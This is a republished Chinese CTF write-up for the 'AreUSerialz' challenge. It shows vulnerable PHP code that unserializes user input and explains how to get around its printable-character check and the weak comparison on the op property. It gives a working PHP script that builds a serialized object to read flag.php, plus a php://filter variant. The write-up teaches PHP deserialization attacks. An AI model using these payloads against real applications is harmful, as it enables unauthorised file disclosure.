当前位置:网站首页>[网鼎杯 2020 青龙组]AreUSerialz

[网鼎杯 2020 青龙组]AreUSerialz

2022-06-29 17:46:00 华为云

题目

<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler {    protected $op;    protected $filename;    protected $content;    function __construct() {        $op = "1";        $filename = "/tmp/tmpfile";        $content = "Hello World!";        $this->process();    }    public function process() {        if($this->op == "1") {            $this->write();        } else if($this->op == "2") {            $res = $this->read();            $this->output($res);        } else {            $this->output("Bad Hacker!");        }    }    private function write() {        if(isset($this->filename) && isset($this->content)) {            if(strlen((string)$this->content) > 100) {                $this->output("Too long!");                die();            }            $res = file_put_contents($this->filename, $this->content);            if($res) $this->output("Successful!");            else $this->output("Failed!");        } else {            $this->output("Failed!");        }    }    private function read() {        $res = "";        if(isset($this->filename)) {            $res = file_get_contents($this->filename);        }        return $res;    }    private function output($s) {        echo "[Result]: <br>";        echo $s;    }    function __destruct() {        if($this->op === "2")            $this->op = "1";        $this->content = "";        $this->process();    }}function is_valid($s) {    for($i = 0; $i < strlen($s); $i++)        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))            return false;    return true;}if(isset($_GET{'str'})) {    $str = (string)$_GET['str'];    if(is_valid($str)) {        $obj = unserialize($str);    }}

分析

首先需要绕过is_invalid函数,is_valid()函数规定字符的ASCII码必须是32-125,而protected属性在序列化后会出现不可见字符\00*\00,转化为ASCII码不符合要求。

绕过方法:PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过。==即我们最后在构造poc的时候,用public来修饰属性==

首先我们看到了read()里面的file_get_contents敏感函数process()中有调用了read()函数,条件是op == “2”
__destruct()调用了process()函数,条件是op!==“2”
可以看到这里有个弱类型的问题,构造op=2即可绕过了

<?phpclass FileHandler {    public $op=2;    public $filename="flag.php";    public $content="HappyCoder";}$a=new FileHandler();echo serialize($a);?>

或者用php伪协议来读
public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";

原网站

版权声明
本文为[华为云]所创,转载请带上原文链接,感谢
https://bbs.huaweicloud.com/blogs/362908

边栏推荐

猜你喜欢

随机推荐